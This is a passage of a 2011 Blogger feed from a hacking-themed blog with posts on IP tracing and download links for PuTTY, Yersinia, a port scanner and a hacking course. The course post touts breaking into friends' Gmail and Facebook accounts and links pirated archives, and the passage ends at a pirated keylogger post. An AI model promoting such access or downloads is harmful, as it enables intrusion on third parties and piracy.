&lt;tr&gt;&lt;td align=&quot;center&quot; valign=&quot;middle&quot;&gt;&lt;form action=&quot;http://www.ip2location.com/demo.aspx&quot; method=&quot;post&quot; name=&quot;form1&quot;&gt;&lt;textarea cols=&quot;15&quot; name=&quot;ipaddresses&quot; rows=&quot;5&quot; style=&quot;border: 1px solid rgb(161, 210, 254); color: #333333; font-family: Arial,Helvetica,sans-serif; font-size: 9px; text-decoration: none;&quot; wrap=&quot;ON&quot;&gt;&lt;/textarea&gt;&lt;br /&gt;
&lt;input height=&quot;16&quot; name=&quot;submit&quot; src=&quot;http://www.ip2location.com/images/searchboxbutton.gif&quot; type=&quot;image&quot; width=&quot;76&quot; /&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;td height=&quot;112&quot; valign=&quot;top&quot; width=&quot;131&quot;&gt;&lt;a href=&quot;http://www.ip2location.com/&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;112&quot; src=&quot;http://www.ip2location.com/images/searchboxinfo.gif&quot; width=&quot;131&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/3433935519176861062/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-trace-any-ip-address.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3433935519176861062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3433935519176861062'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-trace-any-ip-address.html' title='How to Trace Any IP Address'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-8392837396761112537</id><published>2011-05-08T01:06:00.000-07:00</published><updated>2011-05-08T01:06:05.198-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Trace IP"/><title type='text'>How can your location be traced Via your IP</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGUKYr_06vHgrWE9vR5KAr5ju4nsw9sBkWz_FQc5XOp1WfKlxukppmtUJ0YOci1ulxC-dyjlAImhbo7UllRAJjIrFCjWzZZKCCfVnQ_eMk9isiRlYuFl2lCYXB_3G9ObXJdNWvwJBECx8/s1600-h/vroute.JPG&quot;&gt;&lt;img alt=&quot;Ip gives it all&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5317566746594507634&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGUKYr_06vHgrWE9vR5KAr5ju4nsw9sBkWz_FQc5XOp1WfKlxukppmtUJ0YOci1ulxC-dyjlAImhbo7UllRAJjIrFCjWzZZKCCfVnQ_eMk9isiRlYuFl2lCYXB_3G9ObXJdNWvwJBECx8/s320/vroute.JPG&quot; style=&quot;cursor: pointer; display: block; height: 281px; margin: 0px auto 10px; text-align: center; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
Most people wonder how do &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;websites&lt;/span&gt; come to know of your location from IP.Now you too can find out.Forget users you can even sneak up on websites. Just enter IP/URL/mailid and vola all &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;the details&lt;/span&gt; of are given.&lt;br /&gt;
&lt;br /&gt;
This has some great tools that will help you. You can enter IP/URL/Domain name and much more.&lt;br /&gt;
&lt;br /&gt;
Above is a pic of what it can do (It gives your location. who is your &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;internet provider&lt;/span&gt;, how you are connected to him.&lt;br /&gt;
This &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;software&lt;/span&gt; costs about 60$. What if you dont want to buy the software you can use the lite version. This give only how the data is sent., how are you connected yo him&lt;br /&gt;
&lt;br /&gt;
What if you dont want to &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;download&lt;/span&gt; any thing. then there are some &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;online tools&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Samspade.org&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;net4domain.com&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;visualware.com and more.&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/8392837396761112537/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-can-your-location-be-traced-via.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/8392837396761112537'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/8392837396761112537'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-can-your-location-be-traced-via.html' title='How can your location be traced Via your IP'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGUKYr_06vHgrWE9vR5KAr5ju4nsw9sBkWz_FQc5XOp1WfKlxukppmtUJ0YOci1ulxC-dyjlAImhbo7UllRAJjIrFCjWzZZKCCfVnQ_eMk9isiRlYuFl2lCYXB_3G9ObXJdNWvwJBECx8/s72-c/vroute.JPG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-3424087169217658615</id><published>2011-05-08T01:00:00.000-07:00</published><updated>2011-05-08T01:00:03.256-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Software"/><title type='text'>Direct free Download PuTTY</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;PuTTY is an SSH client port to the Nokia 9200 Communicator series. The current version contains basic SSH protocol support, terminal emulation, and a bare-bones user interface.&lt;br /&gt;
&lt;a href=&quot;http://hackspc.com/wp-content/uploads/2009/03/putty.jpg&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;alignnone size-full wp-image-2184&quot; height=&quot;310&quot; src=&quot;http://hackspc.com/wp-content/uploads/2009/03/putty.jpg&quot; title=&quot;putty&quot; width=&quot;499&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border=&quot;1&quot;&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td align=&quot;center&quot; colspan=&quot;2&quot;&gt; PuTTY&lt;/td&gt; &lt;td align=&quot;center&quot; rowspan=&quot;6&quot;&gt;&lt;a href=&quot;http://www.chiark.greenend.org.uk/%7Esgtatham/putty/download.html&quot;&gt;&lt;img align=&quot;center&quot; alt=&quot;download&quot; class=&quot;alignnone size-full wp-image-2115&quot; height=&quot;70&quot; src=&quot;http://hackspc.com/wp-content/uploads/2009/03/download-button.jpg&quot; title=&quot;Download&quot; width=&quot;80&quot; /&gt;&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Website&lt;/td&gt; &lt;td&gt;&lt;a href=&quot;http://www.chiark.greenend.org.uk/%7Esgtatham/putty/&quot;&gt;http://www.chiark.greenend.org.uk/~sgtatham/putty/&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Download Page&lt;/td&gt; &lt;td&gt;&lt;a href=&quot;http://www.chiark.greenend.org.uk/%7Esgtatham/putty/download.html&quot;&gt;http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;File size&lt;/td&gt; &lt;td&gt; 196 kb&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;License&lt;/td&gt; &lt;td&gt;Freeware&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Operating System&lt;/td&gt; &lt;td&gt; Windows 2000/XP   &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/3424087169217658615/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/direct-free-download-putty.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3424087169217658615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3424087169217658615'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/direct-free-download-putty.html' title='Direct free Download PuTTY'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-1725472491629810120</id><published>2011-05-08T00:53:00.000-07:00</published><updated>2011-05-08T00:53:02.593-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Software"/><title type='text'>Direct free Download Yersinia</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.&lt;br /&gt;
&lt;a href=&quot;http://hackspc.com/wp-content/uploads/2009/03/yersenis.png&quot;&gt;&lt;img alt=&quot;hacking tools&quot; class=&quot;alignnone size-full wp-image-2182&quot; height=&quot;367&quot; src=&quot;http://hackspc.com/wp-content/uploads/2009/03/yersenis.png&quot; title=&quot;yersenis&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border=&quot;1&quot;&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td align=&quot;center&quot; colspan=&quot;2&quot;&gt; Yersinia&lt;/td&gt; &lt;td align=&quot;center&quot; rowspan=&quot;6&quot;&gt;&lt;a href=&quot;http://www.yersinia.net/download.htm&quot;&gt;&lt;img align=&quot;center&quot; alt=&quot;download&quot; class=&quot;alignnone size-full wp-image-2115&quot; height=&quot;70&quot; src=&quot;http://hackspc.com/wp-content/uploads/2009/03/download-button.jpg&quot; title=&quot;Download&quot; width=&quot;80&quot; /&gt;&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Website&lt;/td&gt; &lt;td&gt;&lt;a href=&quot;http://www.yersinia.net/&quot;&gt;http://www.yersinia.net/&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Download Page&lt;/td&gt; &lt;td&gt;&lt;a href=&quot;http://www.yersinia.net/download.htm&quot;&gt;http://www.yersinia.net/download.htm&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/1725472491629810120/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/direct-free-download-yersinia.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1725472491629810120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1725472491629810120'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/direct-free-download-yersinia.html' title='Direct free Download Yersinia'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-1255882065182467483</id><published>2011-05-08T00:48:00.001-07:00</published><updated>2011-05-08T00:48:46.213-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Software"/><title type='text'>Download Advanced Port Scanner</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
This is small size, very fast and simple for use port scanner . Just type IP Addresses of the computer , that you want to scan and you´ll get detailed descriptions for common ports.&lt;br /&gt;
&lt;a href=&quot;http://hackspc.com/wp-content/uploads/2009/03/advanced-port-scanner.jpg&quot;&gt;&lt;img alt=&quot;hack&quot; class=&quot;alignnone size-full wp-image-2142&quot; height=&quot;506&quot; src=&quot;http://hackspc.com/wp-content/uploads/2009/03/advanced-port-scanner.jpg&quot; title=&quot;advanced-port-scanner&quot; width=&quot;492&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border=&quot;1&quot;&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td align=&quot;center&quot; colspan=&quot;2&quot;&gt;Advanced Port Scanner&lt;/td&gt; &lt;td align=&quot;center&quot; rowspan=&quot;8&quot;&gt;&lt;a href=&quot;http://www.download.com/Advanced-Port-Scanner/3000-18508_4-98269.html?part=dl-73294&amp;amp;subj=dl&amp;amp;tag=button&quot;&gt;&lt;img align=&quot;center&quot; alt=&quot;download&quot; class=&quot;alignnone size-full wp-image-2115&quot; height=&quot;70&quot; src=&quot;http://hackspc.com/wp-content/uploads/2009/03/download-button.jpg&quot; title=&quot;Download&quot; width=&quot;80&quot; /&gt;&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Website&lt;/td&gt; &lt;td&gt;&lt;a href=&quot;http://www.radmin.com/products/utilities/portscanner.php&quot;&gt;http://www.radmin.com/products/utilities/portscanner.php&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Download Page&lt;/td&gt; &lt;td&gt;&lt;a href=&quot;http://www.download.com/Advanced-Port-Scanner/3000-18508_4-98269.html?part=dl-73294&amp;amp;subj=dl&amp;amp;tag=button&quot;&gt;http://www.download.com/Advanced-Port-Scanner&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;File size&lt;/td&gt; &lt;td&gt;426 KB &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;Operating System&lt;/td&gt; &lt;td&gt;Windows 95/98/ME/NT4.0/2000/XP/2003/Vista/2008  &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt;License:&lt;/td&gt; &lt;td&gt;Free&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;code&gt;&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/1255882065182467483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/download-advanced-port-scanner.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1255882065182467483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1255882065182467483'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/download-advanced-port-scanner.html' title='Download Advanced Port Scanner'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-7307319488880233345</id><published>2011-05-08T00:46:00.001-07:00</published><updated>2011-05-08T00:46:48.355-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Software"/><title type='text'>Ethical Hacking &amp; Information Security Toolkit</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6TIALTMWdiVNmn15j1oq5TlAevI7xIgDUi86a89JSkwo0HMXDp132oZa71NSQ77i-lcODjMFfd8ejIOFUE6ZRbsmh9ywNK12OcroOjLn76j5jehTsS81QFYip6uTQcQgirgQXLW_sV1k/s1600/20101217055842.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6TIALTMWdiVNmn15j1oq5TlAevI7xIgDUi86a89JSkwo0HMXDp132oZa71NSQ77i-lcODjMFfd8ejIOFUE6ZRbsmh9ywNK12OcroOjLn76j5jehTsS81QFYip6uTQcQgirgQXLW_sV1k/s320/20101217055842.jpg&quot; width=&quot;234&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Kyrion - Ethical Hacking &amp;amp; Information Security Toolkit |  4.29 GB&lt;/b&gt;&lt;/div&gt;Control any PC (like opening the CD-ROM, Viewing the Screen, Controlling Mouse etc.) in London sitting right at your place like Delhi. Get into your Friends Accounts of Gmail, Facebook, Orkut and many more in Fraction of Seconds. All E-Mail accounts are now yours, Send mails from any E-mail account without actually logging into it. Surprised? Don’t be. The Kyrion Ethical &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;Hacking&lt;/span&gt; &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;Workshop&lt;/span&gt; trains you in every domain related to Cyber Security. However, we do everything – Ethically!!! To be an Ethical Hacker, it is important to think like them!&lt;br /&gt;
&lt;br /&gt;
The focus of the workshop is to teach you how to protect yourself from the menace of hacking. During the workshop, the primary aim is to introduce you to the current popular attacks and explain the techniques to counter them. Don&#39;t worry, it would not be a &quot;scriptkiddie&quot; &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;material&lt;/span&gt;, it will cover concepts and  working of the Attacks. Development of your own tools and scripts will  also be covered.&lt;br /&gt;
&lt;br /&gt;
The other focus of the workshop is to enable you to build up future systems. It includes making you aware of the current shortcomings which give rise to bad security systems. As it is a vast topic, we will be giving an overview of what constitutes an &#39;ideal &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;secure&lt;/span&gt; system&#39;. This course would equip students to  counter the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;potential&lt;/span&gt; attacks. Also, the aim would be to impart technical know-how of how to make the Internet transactions safe and secure. This would be a founding stone for India to emerge as a Super Power in times to come.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Course Details:&lt;/b&gt;&lt;br /&gt;
The workshop covers the key concepts of ethical hacking, Trojans, Web Security, Wireless Security and Software Cracking. The course structure is well defined and provides in-depth knowledge on cyber security with addition to live demonstrations. With exceptionally good reviews, Kyrion stands as a highly reputed company in providing Ethical Hacking Workshop Training. To register now and avail early bird discounts&lt;br /&gt;
&lt;br /&gt;
# Concept of Ethical Hacking&lt;br /&gt;
# &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;Email&lt;/span&gt; Hacking&lt;br /&gt;
# Windows Hacking and Security&lt;br /&gt;
# Trojans&lt;br /&gt;
# Web Server as a &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;Target&lt;/span&gt;&lt;br /&gt;
# Wireless Hacking&lt;br /&gt;
# Software Cracking and Patching&lt;br /&gt;
# Mobile Tips &amp;amp; Tricks&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download&lt;/b&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43543783/Kyrion-Ethical.Hacking.part01.rar&quot;&gt;http://www.filesonic.com/file/43543783/Kyrion-Ethical.Hacking.part01.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43543841/Kyrion-Ethical.Hacking.part02.rar&quot;&gt;http://www.filesonic.com/file/43543841/Kyrion-Ethical.Hacking.part02.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43543797/Kyrion-Ethical.Hacking.part03.rar&quot;&gt;http://www.filesonic.com/file/43543797/Kyrion-Ethical.Hacking.part03.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43543835/Kyrion-Ethical.Hacking.part04.rar&quot;&gt;http://www.filesonic.com/file/43543835/Kyrion-Ethical.Hacking.part04.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43543861/Kyrion-Ethical.Hacking.part05.rar&quot;&gt;http://www.filesonic.com/file/43543861/Kyrion-Ethical.Hacking.part05.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43546291/Kyrion-Ethical.Hacking.part06.rar&quot;&gt;http://www.filesonic.com/file/43546291/Kyrion-Ethical.Hacking.part06.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43546333/Kyrion-Ethical.Hacking.part07.rar&quot;&gt;http://www.filesonic.com/file/43546333/Kyrion-Ethical.Hacking.part07.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43546317/Kyrion-Ethical.Hacking.part08.rar&quot;&gt;http://www.filesonic.com/file/43546317/Kyrion-Ethical.Hacking.part08.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43546081/Kyrion-Ethical.Hacking.part09.rar&quot;&gt;http://www.filesonic.com/file/43546081/Kyrion-Ethical.Hacking.part09.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.filesonic.com/file/43545795/Kyrion-Ethical.Hacking.part10.rar&quot;&gt;http://www.filesonic.com/file/43545795/Kyrion-Ethical.Hacking.part10.rar&lt;/a&gt;&lt;br /&gt;
or&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/UsdRdRj/Kyrion-Ethical.Hacking.part01.rar&quot;&gt;http://www.fileserve.com/file/UsdRdRj/Kyrion-Ethical.Hacking.part01.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/wMBVV89/Kyrion-Ethical.Hacking.part02.rar&quot;&gt;http://www.fileserve.com/file/wMBVV89/Kyrion-Ethical.Hacking.part02.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/UK2Gmhr/Kyrion-Ethical.Hacking.part03.rar&quot;&gt;http://www.fileserve.com/file/UK2Gmhr/Kyrion-Ethical.Hacking.part03.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/FPCGC7X/Kyrion-Ethical.Hacking.part04.rar&quot;&gt;http://www.fileserve.com/file/FPCGC7X/Kyrion-Ethical.Hacking.part04.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/4FcWrZE/Kyrion-Ethical.Hacking.part05.rar&quot;&gt;http://www.fileserve.com/file/4FcWrZE/Kyrion-Ethical.Hacking.part05.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/goog_401346129&quot;&gt;http://www.fileserve.com/file/thnCRxT/Kyrion-Ethical.Hacking.part06.rar&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt; &lt;a href=&quot;http://www.fileserve.com/file/dJYZvWp/Kyrion-Ethical.Hacking.part07.rar&quot;&gt;http://www.fileserve.com/file/dJYZvWp/Kyrion-Ethical.Hacking.part07.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/7TmgZb2/Kyrion-Ethical.Hacking.part08.rar&quot;&gt;http://www.fileserve.com/file/7TmgZb2/Kyrion-Ethical.Hacking.part08.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/v2XJcyc/Kyrion-Ethical.Hacking.part09.rar&quot;&gt;http://www.fileserve.com/file/v2XJcyc/Kyrion-Ethical.Hacking.part09.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.fileserve.com/file/cqCtvBh/Kyrion-Ethical.Hacking.part10.rar&quot;&gt;http://www.fileserve.com/file/cqCtvBh/Kyrion-Ethical.Hacking.part10.rar&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/7307319488880233345/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/ethical-hacking-information-security.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7307319488880233345'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7307319488880233345'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/ethical-hacking-information-security.html' title='Ethical Hacking &amp; Information Security Toolkit'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6TIALTMWdiVNmn15j1oq5TlAevI7xIgDUi86a89JSkwo0HMXDp132oZa71NSQ77i-lcODjMFfd8ejIOFUE6ZRbsmh9ywNK12OcroOjLn76j5jehTsS81QFYip6uTQcQgirgQXLW_sV1k/s72-c/20101217055842.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-1206456145890719816</id><published>2011-05-08T00:44:00.001-07:00</published><updated>2011-05-08T00:44:43.937-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Software"/><title type='text'>download Free Elite Keylogger with Serials Keys</title><content type='html'>&lt;div 